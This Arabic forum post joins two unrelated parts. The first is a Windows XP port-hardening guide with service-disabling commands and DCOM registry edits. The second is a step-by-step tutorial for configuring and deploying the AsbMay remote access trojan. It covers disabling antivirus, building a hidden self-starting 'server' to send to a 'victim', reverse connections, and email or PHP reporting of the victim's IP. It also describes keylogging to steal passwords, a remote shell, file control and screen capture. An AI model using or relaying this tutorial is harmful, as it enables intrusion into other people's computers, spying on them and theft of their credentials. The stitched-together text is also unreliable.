تعلم كيف تحمي جهازك من الاختراق .. خطوة بخطوة..الشرح الكامل وبالصور.. خاص لمن لديه إكس بي....!!!!!!!!!!!!
سنغلق بإذن الله جميع المنافذ والثغراث التي تستخدم من المخترقين .. يعني إنت ستقطع الطريق عليهم إلى حد كبير جداً......
من أجل أن أختصر عليكم سأدخل في الصميم ، وهو أن الموضوع مقسم إلى :
1-إغلاق المنافذ،
2 - إيقاف الخدمات التي تشكل ثغرات
طبعاً هذه العملية بالإضافة إلى استخدام حاجز ناري جيد وتنصيب جميع الباتشات من موقع ميكروسوفت أول بأول ...
بسم الله نبدأ و الموضوع يخص ثغرات الويندوز إكس بي فقط
من الدوس , ذهب إلى Start ثم Run ثم أكتب cmd وثم اضغط انتر
لترى المنافذ المفتوحة اكتب الأمر netstat –ano خذ لها صورة أو لقطة إن أحببت ستجدها كما في الصورة :
واضح عندك أنه يوجد بعض المنافذ المفتوحة ، ويختلف عددها من شخص إلى آخر . ومن أجل إقفال هذه المنافذ ........ اتبع الخطوات التالية:
بداية نفذ هذه الخطوات وأنت غير متصل بالانترنت لأن المتصفح والمسنجر وخلافه لابد لها من منافذ للاتصال. والخطوات هي:
1- قم بنسخ الأوامر التالية والصقها في الدوس:
.................................................. .................................................. .........
sc config policyagent start= disabled
sc config ssdpsrv start= disabled
sc config messenger start= disabled
sc config w32time start= disabled
sc config netbt start= disabled
exit
.................................................. .................................................. .......
أنت أغلقت معظم المنافذ ولم يبقى إلا ثلاثة منافذ مفتوحة فقط هي
135 \ 445 \ 1025
2- لإغلاق المنفذ الخطير 135 ( أكيد بتذكروا فيروس إعادة التشغيل) (بلاستر) لقد دخل مع هذا المنفذ ولم يوقفه أي حاجز ناري .
ولإغلاق المنفذ: هناك طريقتين:
الطريقة الأولى:
إذهب إلى Start ثم Run ثم أكتب dcomcnfg و اضغط إنتر
اذهب إلى المسار التالي :
Console root \ Component Services\Computers\ My computer
واضغط عليه بالماوس بالزر اليمين واختر الخصائص ، كما في الصورة:
ثم اذهب إلى اللسان Default properties وشيل علامة الصح من أمام Enabled distributed Com
كما في الصورة:
نحنا الآن أوقفنا خدمة الـ Dcom ولكن المنفذ 135 لا يزال مفتوح.
الخطوة الأخيرة والقاضية:
إذهب إلى اللسان Default Protocols
وظلل Connection Oriented TCP\IP
و اضغط على Remove
هكذا نكون أغلقنا المنفذ 135 للأبد طبعاً جميع العمليات تتطلب إعادة تشغيل الجهاز
ولكن نصبر حبتين إلى أن ننتهي من جميع الخطوات ثم نعيد التشغيل مرة واحدة
الطريقة الثانية:
نستطيع عمل ذلك من الريجستري بكل سهولة
في الريجستري اذهب إلى المسار
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole]
ثم إلى القيمة EnableDCOM
في الشق الأيمن انقر بالزر اليمين بالماوس عليها واختار Modify
اكتب N بدلا من Y ................... يعني حولنا من Yes إلى No
---------------------------------------------
لحذف البروتوكول
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc ]
اذهب إلى DCOM Protocols
Modify
احذف ncacn_ip_tcp
بعدها أعد التشغيل ثم اكتب الأمر netstat -ano ستجده كما في الصورة :
كما ترون في الصورة بقي المنفذ 1025 يجب إن يبقى مفتوح لأنه منفذ جدولة المهام وترتبط به عمليات مهمة جداً مثل استعادة النظام .
ثاني
اختراق الأجهزة مع برنامج AsbMay (ممتاز)عربي + شرح بالصور فان اردنا تدمير العالم لدمر
بسم الله الرحمن الرحيم
اقدم لكم اليوم اروع برامج اختراق الاجهزة وهي
AsbMay_2.3
هذا البرنامج الرائع من برمجة عصب ماي الهكر العربي المصري المشهور وسأقوم بشرح برنامجه الذين يستخدمونه الغرب الآن
الإصدار : 2.3 التعديل الأول
البرنامج موجود بالمرفقات
بالبداية وقبل كل شي اطفئ مكافح الفيروسات
نبدأ الشرح :
عند فك الضغط والدخول للمجلد سيظهر لك عدة ملفات..
يهمنا الان ثلاث ملفات . انظر الصورة:
AsbMay: البرنامج الرئيسي
Edit Server : لتعديل السيرفر الذي سنرسله للضحية
Server: السيرفر الذي سنقوم بالتعديل عليه
الان سنقوم بالتعديل على السيرفر الذي سنقوم بإرساله الى الضحية
افتح الملف Edit Server
ستظهر لك الشاشة التالية
في البداية اضغط على فتح واختر السيرفر
الان سنبدأ التعديل عليه
التبويب خيارات عامة.
1- المنفذ : يفضل ابقاءه كما هو
2-ذوبان الخادم عند التشغيل : عندما تقوم الضحية بتشغيل السيرفر سوف يختفي السيرفر وقد يثير شك الضحية لكن يمكن استخدامه للخدعة.
3-تفعيل الاتصال العكسي : يقوم هذا الخيار بالاتصال بك عندما تقوم الضحية بدخول الانترنت . ولكن لمتصلي الدايل اب ( سلك التلفون) لن يستطيعون الاستفادة منه لانه سوف يتصل برقم الايبي وعند اعادة تشغيل الجهاز سوف يتغير الايبي . وهو مفيد جدا جدا لمن لديهم رقم ip ثابت.
4-تكرير الاتصال العكسي كل 10 ثواني : واضح
5-التشغيل في الرجسيتري: عندما تقوم الضحية بتشغيل الجهاز يعمل السيرفر مع بدء التشغيل وهو مفيد جدا.الا لمن لديهم برامج سكان تعمل سكان على البرامج التي تعمل مع بدء التشغيل مثل الكاسبر.
6-كلمة مرور الخادم : عمل كلمة مرور للسيرفر لكي لا يخترق الضحية مخترقون اخرون.
التبويب خيارات رسالة النظام
يمكنك تفعيلها او لا وهي واضحة على ما اعتقد
هل تريد رسالة من النظام اي عندما تقوم الضحية بفتح السيرفر ؟
ما هو نوعه وما ذا يظهر ؟
التبويب :خيارات التبليغ
هذا اهم تبويب وهي كيف تصلك المعلومات عن الضحية مثل رقم الايبي والمنفذ
1-البريد الالكتروني: ادخل بريدك الالكتروني الذي سيصل عليه التبليغ
2- استخدام التبليغ بالبريد:
هنا يمكنك استخدام التبليغ بالبريد اذا اردت فقط ادخل اسم الضحية وخادم بريدك . بالنسبة لخادم بريدك سنستخدم برنامج smq الموجود في آخر الشرح. حجمه لا يتعدى 10 كيلوبايت.
3-استخدام التبليغ بصفات PHP
وهذا هو الافضل . يمكنك استخدام صفحة عصب ماي فقط قم بالتأشير عليها والتجربة هل سيأتيك البريد ام لا. او استخدام صفحة شخصية وطريقتها:
هناك ملف بين الملفات مع البرنامج اسمهmail قم برفعه على موقعك المجاني ووضع الرابط والاسفل ثم التجربة.
للحصول على موقع مجاني استخدم هذا الموقع
www.malware-site.wwwالتبليغ عن طريق الاي بي: كما ذكرت ليس مفيد للدايل اب واذا كان لديك ايبي ثابت ادخله هنا
لغة التبليغ : اللغة الذي سيصلك بها التبليغ
التبويب خيارات الأيقونة :
اعتقد ان هذا واضح . اختر ايقونة للسيرفر.
بعد ذلك اذهب الى خيارات عامة واختر (حفظ في نسخة جديدة)
ستلاحظ وجود ملف جديد بالايقونة التي اخترتها . هذا هو السيرفر الذي سترسله للضحية
الان جاء دور شرح البرنامج:
قم بفتح البرنامج واسمه AsbMay
ستظهر لك هذه الصورة المخيفة
الآن بعد ارسال السيرفر للضحية ستصلك رسالة على ايميلك تبين لك امرين مهمين هما:
رقم الايبي
رقم المنفذ
ادخل رقم الايبي ورقم المنفذ في الخانتين الموضحتين
بعد ذلك اضغط اتصال ليتم الاتصال
بعد الاتصال انت الان داخل جهاز الضحية وسنشرح الاوامر:
1-البحث عن ضحايا:يمكنك هنا ادخال رقم ايبي ومنفذ للبحث عن ضحية . يفضل البحث باستخدام المنفذ 2121 وهذا هو المنفذ المصاب بسيرفر عصب ماي.
2-اتصال عكسي : اذا كنت قد فعلت الاتصال العكسي عند تعديل السيرفر يمكنك هنا ان يقوم السيرفر بالاتصال بك اذا كان متصل بالانترنت.
3-صائد الايبهات: يقوم بالبحث عن رقم الايبي
4-الماتريكس: هذا الخيار ارائع يمكنك من محادثة الضحية بشاشة فلم الماتريكس المشهورة . وهي ان تصبح كل الشاشة سوداء ورسائلك تصله باللون الاخضر .
المرح: مجموعة من اوامر المرح للتلاعب بالضحية.
تحميل ملف: وهو لتحميل ملف من الانترنت لجهاز الضحية . ادخل الرابط ثم ادخل مكان حفظ الملف.
ادارة الملفات: وهنا للتحكم بملفات الموجودة بجهاز الضحية من حذف واعادة تسمية وغيره الكثير.
التصوير : وهو لتصوير سطح المكتب للضحية اي كأنك انت الذي ترى الشاشة وهو رائع جدا.
ادارة الدوس : وهو لفتح موجه الدوس بجهاز الضحية وادخال الاوامر التي تريدها.
فاحص المنافذ : وهو برنامج صغير لفحص المنافذ لجهاز معين لترى اي منفذ مفتوح . يمكنك استخدامه لفحص جهازك اذا كان هناك منافذ مفتوحة.
تبليغ الايبي : هذا لتبليغ الايبي ااذا كنت قد حددته في تعديل السيرفر لمن لديهم رقم ايبي ثابت.
رسائل النظام : وهو شبيه بالذي في تعديل السيرفر لكن لاخراج الرسالة مباشرة في جهاز الضحية.
الشات : للتحادث مع الضحية
جاسوس لوحة المفاتيح: لتعرف كل ما يكتبه الضحية ... رائع لمعرفة كلمات السر للماسنجر وغيره.
الحافظة : اولا ما هي الحافظة
عندما تنسخ نص محدد يحفظ في مكان بالوندوز يقال له الحافظة . اي يمكنك الدخول لحافظة الضحية والتعديل عليها.
البحث عن ملفات : للبحث عن ملفات محددة داخل جهاز الضحية
ادارة النوافذ : وهي اذا كان هناك نوافذ مفتوحة بجهاز الضحية مثل المفكرة او انترنت اكسبلورر يمكنك اغلاقها او فتح غيرها .
تعديل البيانات : وهو لتعديل بياناتك اوا لتبليغ او رقم الايبي وغيره .
انتهى الشرح
اتمنى ان الشرح كان كافيا ووافيا
حمل من هنا